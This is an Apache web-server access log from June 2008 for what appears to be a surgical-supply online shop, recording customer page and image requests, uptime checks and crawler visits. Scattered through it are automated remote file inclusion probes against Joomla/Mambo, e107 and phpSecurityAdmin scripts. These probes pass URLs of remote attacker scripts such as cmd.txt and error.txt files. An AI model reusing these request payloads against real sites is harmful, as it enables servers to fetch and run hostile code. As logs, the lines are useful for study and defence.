69.111.167.100 - - [10/Jun/2008:02:07:14 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:17 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:17 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:18 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:20 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:21 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:07:22 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.218.24.8 - - [10/Jun/2008:02:07:22 -0400] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:07:25 -0400] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:07:26 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:07:32 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
69.89.22.130 - - [10/Jun/2008:02:08:12 -0400] "GET /logs/index.php?redir=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
69.89.22.130 - - [10/Jun/2008:02:08:12 -0400] "GET /index.php?redir=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
60.248.160.127 - - [10/Jun/2008:02:08:12 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 142355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
60.248.160.127 - - [10/Jun/2008:02:08:16 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 142355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
69.111.167.100 - - [10/Jun/2008:02:08:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/conventions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:08:38 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:08:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0F8452107A199500CFA2031+M37+ENG HTTP/1.1" 200 50746 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:08:43 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F8452107A199500CFA2031+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:08:43 -0400] "GET /images/items/0031191_THUMB.JPG HTTP/1.1" 200 3852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F8452107A199500CFA2031+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:08:43 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F8452107A199500CFA2031+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.59.12.99 - - [10/Jun/2008:02:08:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.251.37.164 - - [10/Jun/2008:02:09:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LDF645118459959006C62074+M37+ENG HTTP/1.1" 200 34464 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF6451104F09E9005A82074+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3)"
69.111.167.100 - - [10/Jun/2008:02:09:08 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F8452107A199500CFA2031+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:09:47 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45965 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:09:48 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:09:48 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:09:48 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.111.167.100 - - [10/Jun/2008:02:10:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
82.165.183.134 - - [10/Jun/2008:02:10:32 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
82.165.183.134 - - [10/Jun/2008:02:10:33 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
74.218.24.8 - - [10/Jun/2008:02:10:43 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:11:01 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
80.25.230.39 - - [10/Jun/2008:02:11:13 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 214 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.25.230.39 - - [10/Jun/2008:02:11:14 -0400] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.25.230.39 - - [10/Jun/2008:02:11:14 -0400] "GET //index.php/?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 209 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.25.230.39 - - [10/Jun/2008:02:11:15 -0400] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
74.218.24.8 - - [10/Jun/2008:02:11:41 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:11:46 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
66.249.70.52 - - [10/Jun/2008:02:11:06 -0400] "GET /logs/access_log.Q108052400 HTTP/1.1" 200 1309393 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.218.24.8 - - [10/Jun/2008:02:12:56 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:12:56 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2008:02:13:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.218.24.8 - - [10/Jun/2008:02:14:47 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:14:55 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:15:14 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:15:23 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:15:31 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:15:31 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:16:01 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:16:01 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:16:43 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:16:43 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:17:09 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:17:15 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:17:22 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:17:32 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
91.43.85.245 - - [10/Jun/2008:02:17:41 -0400] "GET /logs/index.php?option=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
91.43.85.245 - - [10/Jun/2008:02:17:41 -0400] "GET /index.php?option=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
71.39.214.250 - - [10/Jun/2008:02:18:38 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 247 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
71.39.214.250 - - [10/Jun/2008:02:18:38 -0400] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
71.39.214.250 - - [10/Jun/2008:02:18:39 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 242 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
71.39.214.250 - - [10/Jun/2008:02:18:39 -0400] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
209.59.12.99 - - [10/Jun/2008:02:18:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.52 - - [10/Jun/2008:02:16:11 -0400] "GET /logs/access_log.Q108052200 HTTP/1.1" 200 5021201 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.218.24.8 - - [10/Jun/2008:02:21:18 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:21:18 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:22:59 -0400] "GET /logs//123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
74.218.24.8 - - [10/Jun/2008:02:22:59 -0400] "GET //123flashchat.php?e107path=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2008:02:23:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.7.108.240 - - [10/Jun/2008:02:24:56 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
207.7.108.240 - - [10/Jun/2008:02:24:56 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.249.70.52 - - [10/Jun/2008:02:25:36 -0400] "GET /logs/error_log.Q108052900 HTTP/1.1" 200 328620 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.0.18.81 - - [10/Jun/2008:02:26:23 -0400] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
209.59.12.99 - - [10/Jun/2008:02:28:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.95.117.211 - - [10/Jun/2008:02:32:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:32:52 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:32:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:20 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.1" 200 70652 "http://www.acesurgical.com/nuoss_particulates.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:21 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:21 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
76.95.117.211 - - [10/Jun/2008:02:33:22 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
